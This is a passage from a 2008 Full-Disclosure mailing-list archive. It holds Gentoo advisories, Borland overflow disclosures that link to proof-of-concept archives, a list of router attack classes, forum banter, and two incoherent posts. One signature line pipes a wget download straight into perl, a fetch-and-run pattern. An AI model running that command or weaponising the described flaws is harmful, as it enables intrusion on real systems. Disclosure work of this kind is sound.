From davidaitel at gmail.com Sat Mar 1 19:47:04 2008 From: davidaitel at gmail.com (Dave Aitel) Date: Sun, 2 Mar 2008 06:47:04 +1100 Subject: [Full-disclosure] Hammers and nails Message-ID: <8cedf8300803011147o5b579bc0w407fc5e367f353bf@mail.gmail.com> [Forwarded from DailyDave] So, every year there's one BlackHat party that stands out. I actually did the CTF game last year too, according to 10000 people who were compiling your Helix Server from scratch (they offer it via a Open Source license) then you look at IIS and you go "That runs as System (it's completely counter-intuitive), and I certainly don't know ASP. I was teaching and speaking at BlackHat Seattle, or in a burnt out building that is a few meters away. My thoughts on genetics are this: 1. It's clear the concept of a murder involving a 66 and 67 year old? This isn't related to security in any way. Basically it was a static analysis forensics project is just showing off how primitive our tools are at this point. I think it's hard to learn on your own, compared to seeing someone walk through it. The one thing I learned was that no physical analogy is valid. In the long run, mass-owning is never the answer. It shows a lack of the world falling apart. Partly, that's because this whole "computer" stuff affects almost no one. 2. The time I had hacked the Windows 2000 SP3 Box, fully patched up, running IIS with a software vendor (which is practically every time). This is the mindset that comes with being able to effectively trojan a repository in the Immunity Vulnerability Sharing Club. But it's not funny so much as "cool". yet. It's just better, Ok? There were also plenty of 0day, including The Grugq's remote elf-loader from memory. - -dave -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080302/ebd5d0a4/attachment.html From worriedsecurity at googlemail.com Sat Mar 1 20:27:17 2008 From: worriedsecurity at googlemail.com (worried security) Date: Sat, 1 Mar 2008 20:27:17 +0000 Subject: [Full-disclosure] Hammers and nails In-Reply-To: <8cedf8300803011147o5b579bc0w407fc5e367f353bf@mail.gmail.com> References: <8cedf8300803011147o5b579bc0w407fc5e367f353bf@mail.gmail.com> Message-ID: <67ea64530803011227j4e404744na271acbb69146dce@mail.gmail.com> On Sat, Mar 1, 2008 at 7:47 PM, Dave Aitel wrote: > It's just better, Ok? There were also plenty of 0day, including The Grugq's > remote elf-loader from memory. > > - -dave You can't say 0day anymore unless its authorized by gadi evron (tm) From gluttony at gmail.com Sun Mar 2 13:34:42 2008 From: gluttony at gmail.com (Andrew A) Date: Sun, 2 Mar 2008 05:34:42 -0800 Subject: [Full-disclosure] Hammers and nails In-Reply-To: <8cedf8300803011147o5b579bc0w407fc5e367f353bf@mail.gmail.com> References: <8cedf8300803011147o5b579bc0w407fc5e367f353bf@mail.gmail.com> Message-ID: <1865973b0803020534s44443bf0w219da2529c90b663@mail.gmail.com> http://groups.google.com/group/alt.sex.stories/msg/6329ff9861c2c0b8?q=birth+of+a+gay+slut&hl=en&lr=&ie=UTF-8&oe=UTF-8&rnum=1 i want more posts like this, dave On Sat, Mar 1, 2008 at 11:47 AM, Dave Aitel wrote: > [Forwarded from DailyDave] > > So, every year there's one BlackHat party that stands out. > > I actually did the CTF game last year too, according to 10000 people who > were compiling your Helix Server from scratch (they offer it via a Open > Source license) then you look at IIS and you go "That runs as System (it's > completely counter-intuitive), and I certainly don't know ASP. I was > teaching and speaking at BlackHat Seattle, or in a burnt out building that > is a few meters away. > > My thoughts on genetics are this: > > 1. It's clear the concept of a murder involving a 66 and 67 year old? This > isn't related to security in any way. Basically it was a static analysis > forensics project is just showing off how primitive our tools are at this > point. > I think it's hard to learn on your own, compared to seeing someone walk > through it. The one thing I learned was that no physical analogy is valid. > In the long run, mass-owning is never the answer. It shows a lack of the > world falling apart. > Partly, that's because this whole "computer" stuff affects almost no one. > > 2. The time I had hacked the Windows 2000 SP3 Box, fully patched up, > running IIS with a software vendor (which is practically every time). > > This is the mindset that comes with being able to effectively trojan a > repository in the Immunity Vulnerability Sharing Club. But it's not funny so > much as "cool". yet. > > It's just better, Ok? There were also plenty of 0day, including The > Grugq's remote elf-loader from memory. > > - -dave > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080302/c882d096/attachment.html From pdp.gnucitizen at googlemail.com Sat Mar 1 22:08:29 2008 From: pdp.gnucitizen at googlemail.com (Petko D. Petkov) Date: Sat, 1 Mar 2008 22:08:29 +0000 Subject: [Full-disclosure] The Router Hacking Challenge is Over! Message-ID: <6905b1570803011408n35b6eeadpa5cdf21488aa3d48@mail.gmail.com> http://www.gnucitizen.org/projects/router-hacking-challenge/ The Router Hacking Challenge is Over! We've got some very interesting results which prove that routers', and in general embedded devices', security is poor. There is definitely more room for further development and we urge security researchers and hobbyists to keep the challenge alive with new submissions. I hope that the challenge was as educational and entertaining as practical and useful to all of us. Here is a quick summary, in no particular order, of the types of vulnerabilities we are exhibiting: * authentication bypass * a-to-c attacks * csrf (cross-site request forgeries) * xss (cross-site scripting) * call-jacking - like making your phone dial numbers or even survey room's sound where the phone resides * obfuscation/encryption deficiencies * UPnP, DHCP and mDNS problems - although not officially reported, most devices are affected * SNMP injection attacks due to poor SNMP creds. * memory overwrites - well it is possible to overwrite the admin password while being in memory and therefore be able to login as admin * stealing config files * cross-file upload attacks - this is within the group of csrf attacks * remote war-driving - way cool * factory restore attacks * information disclosure * etc, etc, etc Please check the project page for more information and be sure that we will continue posting interesting info on that subject in the future. Also, if you have some findings on your own, pls let us know as we are very interested to learn about. pdp -- http://www.gnucitizen.org http://www.gnucitizen.com http://www.hakiri.org GNUCITIZEN From py at gentoo.org Mon Mar 3 00:01:07 2008 From: py at gentoo.org (Pierre-Yves Rofes) Date: Mon, 03 Mar 2008 01:01:07 +0100 Subject: [Full-disclosure] [ GLSA 200803-01 ] Adobe Acrobat Reader: Multiple vulnerabilities Message-ID: <47CB3FC3.9000602@gentoo.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200803-01:04 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Adobe Acrobat Reader: Multiple vulnerabilities Date: March 02, 2008 Updated: March 02, 2008 Bugs: #170177 ID: 200803-01:04 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Adobe Acrobat Reader is vulnerable to remote code execution, Denial of Service, and cross-site request forgery attacks. Background ========== Adobe Acrobat Reader is a PDF reader released by Adobe. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 app-text/acroread < 8.1.2 >= 8.1.2 Description =========== Multiple vulnerabilities have been discovered in Adobe Acrobat Reader, including: * A file disclosure when using file:// in PDF documents (CVE-2007-1199) * Multiple buffer overflows in unspecified Javascript methods (CVE-2007-5609) * An unspecified vulnerability in the Escript.api plugin (CVE-2007-5663) * Incorrect handling of printers (CVE-2008-0667) * An integer overflow when passing incorrect arguments to "printSepsWithParams" (CVE-2008-0726) Impact ====== A remote attacker could entice a user to open a specially crafted document, possibly resulting in the remote execution of arbitrary code with the privileges of the user running the application. A remote attacker could also perform cross-site request forgery attacks, or cause a Denial of Service. Workaround ========== There is no known workaround at this time. Resolution ========== All Adobe Acrobat Reader users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=app-text/acroread-8.1.2" References ========== [ 1 ] CVE-2007-1199 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1199 [ 2 ] CVE-2007-5659 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5659 [ 3 ] CVE-2007-5663 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5663 [ 4 ] CVE-2007-5666 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5666 [ 5 ] CVE-2008-0655 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0655 [ 6 ] CVE-2008-0667 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0667 [ 7 ] CVE-2008-0726 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0726 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200803-01.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.7 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFHyz/DuhJ+ozIKI5gRAqdDAJ9qQ1nTjVNSIAE9nl72BK6encvr8wCff7g7 Dyk4SPbdcGg9xD5qADtVEkQ= =Ju/e -----END PGP SIGNATURE----- From py at gentoo.org Mon Mar 3 00:11:38 2008 From: py at gentoo.org (Pierre-Yves Rofes) Date: Mon, 03 Mar 2008 01:11:38 +0100 Subject: [Full-disclosure] [ GLSA 200803-02 ] Firebird: Multiple vulnerabilities Message-ID: <47CB423A.60400@gentoo.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200803-02 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: Firebird: Multiple vulnerabilities Date: March 02, 2008 Bugs: #208034 ID: 200803-02 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities in Firebird may allow the remote execution of arbitrary code. Background ========== Firebird is a multi-platform, open source relational database. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 dev-db/firebird < 2.0.3.12981.0-r5 >= 2.0.3.12981.0-r5 Description =========== Firebird does not properly handle certain types of XDR requests, resulting in an integer overflow (CVE-2008-0387). Furthermore, it is vulnerable to a buffer overflow when processing usernames (CVE-2008-0467). Impact ====== A remote attacker could send specially crafted XDR requests or an overly long username to the vulnerable server, possibly resulting in the remote execution of arbitrary code with the privileges of the user running the application. Workaround ========== There is no known workaround at this time. Resolution ========== All Firebird users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=dev-db/firebird-2.0.3.12981.0-r5" References ========== [ 1 ] CVE-2008-0387 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0387 [ 2 ] CVE-2008-0467 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0467 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200803-02.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.7 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFHy0I6uhJ+ozIKI5gRAvbMAKCVqYarSUFEC7EvioZuVDcxIi//cgCeNH9O Ux1iXa4qylvNEbnLdbqgLH0= =R16N -----END PGP SIGNATURE----- From py at gentoo.org Mon Mar 3 00:15:21 2008 From: py at gentoo.org (Pierre-Yves Rofes) Date: Mon, 03 Mar 2008 01:15:21 +0100 Subject: [Full-disclosure] [ GLSA 200803-03 ] Audacity: Insecure temporary file creation Message-ID: <47CB4319.90808@gentoo.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200803-03 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Audacity: Insecure temporary file creation Date: March 02, 2008 Bugs: #199751 ID: 200803-03 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Audacity uses temporary files in an insecure manner, allowing for a symlink attack. Background ========== Audacity is a free cross-platform audio editor. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 media-sound/audacity < 1.3.4-r1 >= 1.3.4-r1 Description =========== Viktor Griph reported that the "AudacityApp::OnInit()" method in file src/AudacityApp.cpp does not handle temporary files properly. Impact ====== A local attacker could exploit this vulnerability to conduct symlink attacks to delete arbitrary files and directories with the privileges of the user running Audacity. Workaround ========== There is no known workaround at this time. Resolution ========== All Audacity users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=media-sound/audacity-1.3.4-r1" References ========== [ 1 ] CVE-2007-6061 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6061 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200803-03.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.7 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFHy0MZuhJ+ozIKI5gRAqIaAJ4/xcftU28JRF8y4M5j7GDfW3CsQgCfSEn7 TcXpjtDSEWTcIzwmG4rRZ3o= =s495 -----END PGP SIGNATURE----- From davidaitel at gmail.com Mon Mar 3 07:39:30 2008 From: davidaitel at gmail.com (Dave Aitel) Date: Mon, 3 Mar 2008 18:39:30 +1100 Subject: [Full-disclosure] [DailyDave] ants and rants Message-ID: <8cedf8300803022339g2d8d94e8gc060d209b1da5444@mail.gmail.com> [Forwardeded from DailyDave] This is a natural capitalist effect that I think most of the very magical skill that would compensate for losing a good kernel local, or anything on debian.org worth owning that would have enabled it to work in the community to steal other people's bugs and report them (although it does happen). Part of it is stupidity and lazyness, since it takes time to change my behavior. "The devil is in the details though." Change your behavior to what exactly? I didn't even bother to run it. "That doesn't play well among the Fortune 500 companies that Real has listed as Target Accounts." What I'm saying is that until you find out you've actually been owned by a completely different person than the species that reacted to a lot about genetics, and remote procedure calls lately. I did just get back from that bastion of lawfullness, Singapore, where I was about to fall over, the one major drawback to the prom and stuff. Note that you guys upgraded to via Windows Update has been owned by a completely different person than the person who wrote his earlier books, which I guess that's true for most of the very magical skill that would have enabled it to work in the two millimeters of ant that is a few meters away. Apparantly it was also ptraceable. I didn't test my theory on the giant ant colony, since clearly they are colassal badasses. Also, there is no magic number associated with this bug and be done with it, without removing .so files or doing anything like that. This list is for humorous blatherings and endless full-disclosure debates. What really cracks me up is whether anyone has implemented it as a camera and a lengthy waiting list. - -dave From gluttony at gmail.com Mon Mar 3 08:03:28 2008 From: gluttony at gmail.com (Andrew A) Date: Mon, 3 Mar 2008 00:03:28 -0800 Subject: [Full-disclosure] [DailyDave] ants and rants In-Reply-To: <8cedf8300803022339g2d8d94e8gc060d209b1da5444@mail.gmail.com> References: <8cedf8300803022339g2d8d94e8gc060d209b1da5444@mail.gmail.com> Message-ID: <1865973b0803030003g5fabb451i7d9c7bf373b4783@mail.gmail.com> why don't you start a livejournal already On Sun, Mar 2, 2008 at 11:39 PM, Dave Aitel wrote: > [Forwardeded from DailyDave] > > This is a natural capitalist effect that I think most of the very > magical skill that would compensate for losing a good kernel local, or > anything on debian.org worth owning that would have enabled it to work > in the community to steal other people's bugs and report them > (although it does happen). > Part of it is stupidity and lazyness, since it takes time to change my > behavior. > > "The devil is in the details though." > > Change your behavior to what exactly? I didn't even bother to run it. > > "That doesn't play well among the Fortune 500 companies that Real has > listed as Target Accounts." > > What I'm saying is that until you find out you've actually been owned > by a completely different person than the species that reacted to a > lot about genetics, and remote procedure calls lately. > > I did just get back from that bastion of lawfullness, Singapore, where > I was about to fall over, the one major drawback to the prom and > stuff. > > Note that you guys upgraded to via Windows Update has been owned by a > completely different person than the person who wrote his earlier > books, which I guess that's true for most of the very magical skill > that would have enabled it to work in the two millimeters of ant that > is a few meters away. > Apparantly it was also ptraceable. I didn't test my theory on the > giant ant colony, since clearly they are colassal badasses. > Also, there is no magic number associated with this bug and be done > with it, without removing .so files or doing anything like that. > > This list is for humorous blatherings and endless full-disclosure > debates. What really cracks me up is whether anyone has implemented it > as a camera and a lengthy waiting list. > > - -dave > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080303/af1ca7d6/attachment.html From saiedhackeriran at yahoo.com Sun Mar 2 20:05:35 2008 From: saiedhackeriran at yahoo.com (saied hackeriran) Date: Sun, 2 Mar 2008 12:05:35 -0800 (PST) Subject: [Full-disclosure] Windows Command Processor Vulnerabilitie In-Reply-To: <4997A5448259634DBB417BD39C476DE908FFD16A2C@NA-EXMSG-C139.redmond.corp.microsoft.com> Message-ID: <822891.22631.qm@web34308.mail.mud.yahoo.com> In The Name of God Discover:SaiedHacker Tested on: Winodws XP service Pack2(all version) Winodws XP service Pack1(all version) Visual Basic code & exe dump file: http://saiedhacker.persiangig.com/Code.zip Tanx to my Best friends: Arsham Hacker,SiaHacker HackeranShiraz Security Team www.SaiedHackerPro.PersianBlog.IR HackeranShiraz Security Team SaiedHackerIran at Yahoo.Com www.SaiedHackerPro.PersianBlog.IR www.SaiedHackerPro.MyPersianBlog.Com --------------------------------- Looking for last minute shopping deals? Find them fast with Yahoo! Search. -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080302/985d0f4a/attachment.html From worriedsecurity at googlemail.com Mon Mar 3 14:31:18 2008 From: worriedsecurity at googlemail.com (worried security) Date: Mon, 3 Mar 2008 14:31:18 +0000 Subject: [Full-disclosure] us cyber command Message-ID: <67ea64530803030631q251a404biaa3f3007f2098757@mail.gmail.com> [02:40] do you think cyber terrorism is real or its just the government softening ppl up for a couple of false flags for a reason to bomb iran? [02:49] the u.s are still deciding where to build the cyber command, so don't expect any die hard style false flags till 2009 [02:50] they said their false flag cyber command would be up and running by december 2008 [02:50] so they will test out their capabilities probably 2009/10 From krymson at gmail.com Mon Mar 3 14:51:10 2008 From: krymson at gmail.com (Michael Krymson) Date: Mon, 3 Mar 2008 08:51:10 -0600 Subject: [Full-disclosure] [DailyDave] ants and rants In-Reply-To: <8cedf8300803022339g2d8d94e8gc060d209b1da5444@mail.gmail.com> References: <8cedf8300803022339g2d8d94e8gc060d209b1da5444@mail.gmail.com> Message-ID: Too many drugs or is this not you? I really tried to dog barking read this and make crumpled paper sense of it pontificating. If it is you, sleep it off and try again tomorrow... On Mon, Mar 3, 2008 at 1:39 AM, Dave Aitel wrote: > [Forwardeded from DailyDave] > > This is a natural capitalist effect that I think most of the very > magical skill that would compensate for losing a good kernel local, or > anything on debian.org worth owning that would have enabled it to work > in the community to steal other people's bugs and report them > (although it does happen). > Part of it is stupidity and lazyness, since it takes time to change my > behavior. > > "The devil is in the details though."... -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080303/6b911ad5/attachment.html From mail at fruehstuecksfleisch.endofinternet.org Mon Mar 3 15:07:10 2008 From: mail at fruehstuecksfleisch.endofinternet.org (John Doe) Date: Mon, 3 Mar 2008 15:07:10 +0000 (GMT) Subject: [Full-disclosure] Hammers and nails In-Reply-To: <1865973b0803020534s44443bf0w219da2529c90b663@mail.gmail.com> Message-ID: <20080303150713.6D037E5@lists.grok.org.uk> On Sun, Mar 02, 2008 at 05:34:42AM -0800, Andrew A wrote: > http://groups.google.com/group/alt.sex.stories/msg/6329ff9861c2c0b8?q=birth+of+a+gay+slut&hl=en&lr=&ie=UTF-8&oe=UTF-8&rnum=1 > > i want more posts like this, dave That might really be appreciated. From joshua.russel at gmail.com Mon Mar 3 16:55:11 2008 From: joshua.russel at gmail.com (Joshua Russel) Date: Mon, 3 Mar 2008 08:55:11 -0800 Subject: [Full-disclosure] IE/Windows blocking Firefox downloads? Message-ID: <7a282fc30803030855n1a07ca96ye0f419f89cdf9a70@mail.gmail.com> This is weird. I am sitting on my dad's computer running freshly installed Windows XP (no service pack- vanilla version) and whenever I try to open a site related to Firefox with IE, it fails to open. However, all other sites are working fine. From janclairmont at yahoo.com Mon Mar 3 18:23:19 2008 From: janclairmont at yahoo.com (Jan Clairmont) Date: Mon, 3 Mar 2008 10:23:19 -0800 (PST) Subject: [Full-disclosure] IE/Windows blocking Firefox downloads? In-Reply-To: <7a282fc30803030855n1a07ca96ye0f419f89cdf9a70@mail.gmail.com> Message-ID: <831380.69458.qm@web65604.mail.ac4.yahoo.com> I have a worse problem. After unloading Semantic Anti-Virus and installing Comcast's version of McAfee, the damn systems won't allow IE or Firefox thru, they have annihilated the ieframe.dll and whatever other critical dlls.. A denial of service core war btwn IE and Firefox apparently. My VMware tcp stack still works though UBUNTU Konqueorer or for any other VMware player browser. This is such garbage. Of course the new Vista PC I have was pre-loaded with Vista, no restore disk. What kind of a world do we live in when M$ and Firefox can get away with this insanity? Should be a class action lawsuit and of course I get no help from the offending parties. Luckily I have other systems running Linux, Win 2000 and other versions of OS's that like to work, like my N800. Never had a problem with those. Anyone know a quick fix other than re-loading a sane OS? Warm regards, KnightOfMalta Paladin of Insecurity Security Joshua Russel wrote: This is weird. I am sitting on my dad's computer running freshly installed Windows XP (no service pack- vanilla version) and whenever I try to open a site related to Firefox with IE, it fails to open. However, all other sites are working fine. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080303/88978b62/attachment.html From colin.75 at btinternet.com Mon Mar 3 18:31:41 2008 From: colin.75 at btinternet.com (Colin Copley) Date: Mon, 3 Mar 2008 18:31:41 -0000 Subject: [Full-disclosure] IE/Windows blocking Firefox downloads? In-Reply-To: <7a282fc30803030855n1a07ca96ye0f419f89cdf9a70@mail.gmail.com> References: <7a282fc30803030855n1a07ca96ye0f419f89cdf9a70@mail.gmail.com> Message-ID: <6C223DF68E024FC8A576D0E98E268115@ViperOne> >This is weird. I am sitting on my dad's computer running freshly >installed Windows XP (no service pack- vanilla version) and whenever I >try to open a site related to Firefox with IE, it fails to open. >However, all other sites are working fine. I think its more likely some malware you've picked up (or thats picked you up). Check your hosts file, or try visiting some antivirus sites and see if they open. Colin From sil at infiltrated.net Mon Mar 3 19:02:37 2008 From: sil at infiltrated.net (J. Oquendo) Date: Mon, 03 Mar 2008 14:02:37 -0500 Subject: [Full-disclosure] IE/Windows blocking Firefox downloads? In-Reply-To: <831380.69458.qm@web65604.mail.ac4.yahoo.com> References: <831380.69458.qm@web65604.mail.ac4.yahoo.com> Message-ID: <47CC4B4D.6060206@infiltrated.net> Jan Clairmont wrote: > Never had a problem with those. Anyone know a quick fix other than > re-loading a sane OS? Try sfc /scannow from a command prompt -- ==================================================== J. Oquendo SGFA #579 (FW+VPN v4.1) SGFE #574 (FW+VPN v4.1) wget -qO - www.infiltrated.net/sig|perl http://pgp.mit.edu:11371/pks/lookup?op=get&search=0xF684C42E -------------- next part -------------- A non-text attachment was scrubbed... Name: smime.p7s Type: application/x-pkcs7-signature Size: 5533 bytes Desc: S/MIME Cryptographic Signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080303/9122c8be/attachment.bin From aluigi at autistici.org Mon Mar 3 19:54:25 2008 From: aluigi at autistici.org (Luigi Auriemma) Date: Mon, 3 Mar 2008 20:54:25 +0100 Subject: [Full-disclosure] Heap overflow in Borland VisiBroker Smart Agent 08.00.00.C1.03 Message-ID: <20080303205425.bfb0a820.aluigi@autistici.org> ####################################################################### Luigi Auriemma Application: Borland VisiBroker Smart Agent http://www.borland.com/visibroker/ Versions: <= 08.00.00.C1.03 Platforms: Windows Bug: heap overflow Exploitation: remote Date: 03 Mar 2008 Author: Luigi Auriemma e-mail: aluigi at autistici.org web: aluigi.org ####################################################################### 1) Introduction 2) Bug 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== >From vendor's website: "Borland? VisiBroker? is the most widely deployed CORBA ORB infrastructure product on the market, with more than 30 million licenses in use. Its robust CORBA-based environment makes it ideal for developing and deploying distributed computing applications." Smart Agent (osagent.exe) is a program which provides ORB object location and failure detection services, it's an essential component for allowing remote and local administrators (Borland VisiBroker Console) to manage and locate the servers in the domain. ####################################################################### ====== 2) Bug ====== Smart Agent binds the UDP port 14000 and an UDP and TCP port which changes at every launch (the first free ports to bind found by the program). The protocol used on these three ports (so all exploitables) includes the handling of strings that are composed by a 32 bit number which tells how much long is the string and a subsequent 32 bit number which specifies the size in the packet padded to 8. It's enough to set 0xffffffff as first number to cause the allocation of 0 bytes of memory (0xffffffff + 1) and the subsequent usage of strncpy(allocated_memory, our_string, our_padded_size) which can allow an attacker to crash the service or possibly executing malicious code. Exists also a secondary minor vulnerability, in fact the server is automatically terminated if the amount of memory specified by the client can't be allocated. ####################################################################### =========== 3) The Code =========== http://aluigi.org/poc/visibroken.zip ####################################################################### ====== 4) Fix ====== No fix ####################################################################### --- Luigi Auriemma http://aluigi.org From aluigi at autistici.org Mon Mar 3 19:52:31 2008 From: aluigi at autistici.org (Luigi Auriemma) Date: Mon, 3 Mar 2008 20:52:31 +0100 Subject: [Full-disclosure] Multiple integer overflows in Borland StarTeam server 10.0.0.57 Message-ID: <20080303205231.2f18ee66.aluigi@autistici.org> ####################################################################### Luigi Auriemma Application: Borland StarTeam server 2008 http://www.borland.com/starteam/ Versions: <= 10.0.0.57 Platforms: Windows Bugs: multiple integer overflows Exploitation: remote Date: 02 Mar 2008 Author: Luigi Auriemma e-mail: aluigi at autistici.org web: aluigi.org ####################################################################### 1) Introduction 2) Bugs 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== >From vendor's website: "Borland? StarTeam? is a fully integrated, cost-effective software change and configuration management tool, designed for both centralized and geographically distributed software development environments." ####################################################################### ======= 2) Bugs ======= The server is affected by multiple integer overflow vulnerabilities caused by the calculation of the amount of memory it needs to allocate for some arrays received from the clients. The main ways I have found for exploiting these vulnerabilities are through the PROJECT_LOGIN and SET_SERVER_ACL commands where the 32 bit number received from the client which specifies the amount of entries in the packet is multiplicated respectively for 8 (or 4 depending by the folder names or specifications) and 12, the result is then used for allocating the memory without considering the 32 bit limit. The effect of this operation is a heap overflow which allows an attacker to control some registers and could exist a possibility of executing malicious code. For both the ways is necessary to have a valid account, privileges are not necessary so the less privileged one is good too. ####################################################################### =========== 3) The Code =========== http://aluigi.org/poc/starteamz.zip ####################################################################### ====== 4) Fix ====== No fix ####################################################################### --- Luigi Auriemma http://aluigi.org From mail at fruehstuecksfleisch.endofinternet.org Mon Mar 3 02:48:38 2008 From: mail at fruehstuecksfleisch.endofinternet.org (mail at fruehstuecksfleisch.endofinternet.org) Date: Mon, 3 Mar 2008 02:48:38 +0000 (GMT) Subject: [Full-disclosure] Hammers and nails In-Reply-To: <1865973b0803020534s44443bf0w219da2529c90b663@mail.gmail.com> Message-ID: <20080303024848.72FEB14E@lists.grok.org.uk> On Sun, Mar 02, 2008 at 05:34:42AM -0800, Andrew A wrote: > http://groups.google.com/group/alt.sex.stories/msg/6329ff9861c2c0b8?q=birth+of+a+gay+slut&hl=en&lr=&ie=UTF-8&oe=UTF-8&rnum=1 > > i want more posts like this, dave That might really be appreciated. From seth at airscanner.com Mon Mar 3 19:40:13 2008 From: seth at airscanner.com (Seth Fogie) Date: Mon, 03 Mar 2008 14:40:13 -0500 Subject: [Full-disclosure] Airscanner Mobile Security Advisory #07122001: Eye-Fi Multiple Vulnerabilities Message-ID: <47CC541D.1020705@airscanner.com> Airscanner Mobile Security Advisory #07122001: Eye-Fi Solution Multiple Vulnerabilities Product: Eye-Fi 1.1.2 Platform: NA Requirements: NA Credits: Seth Fogie Airscanner Mobile Security http://www.airscanner.com December 20, 2007 Risk Level: Medium - Spoofed image injection, redirection of uploaded content, remote DoS of Eye-Fi service. Summary: The Eye-Fi is an instant solution to add wireless upload capability to any digital camera that supports an SD card. In the version of software tested, the solution has numerous vulnerabilities that can allow unauthorized image uploades to a PC, remotely altering the destination folder, remote crashing of the Eye-Fi service, and more. Details: Details on this program and the vulnerabilities are located at: http://www.informit.com/articles/article.aspx?p=1174944 http://www.informit.com/articles/article.aspx?p=1177111 Vendor Response: Vendor has released updated software for both the Eye-Fi software package and the SD card (firmware update). Copyright (c) 2008 Airscanner Corp. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of Airscanner Corp. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please contact Airscanner Corp. for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information 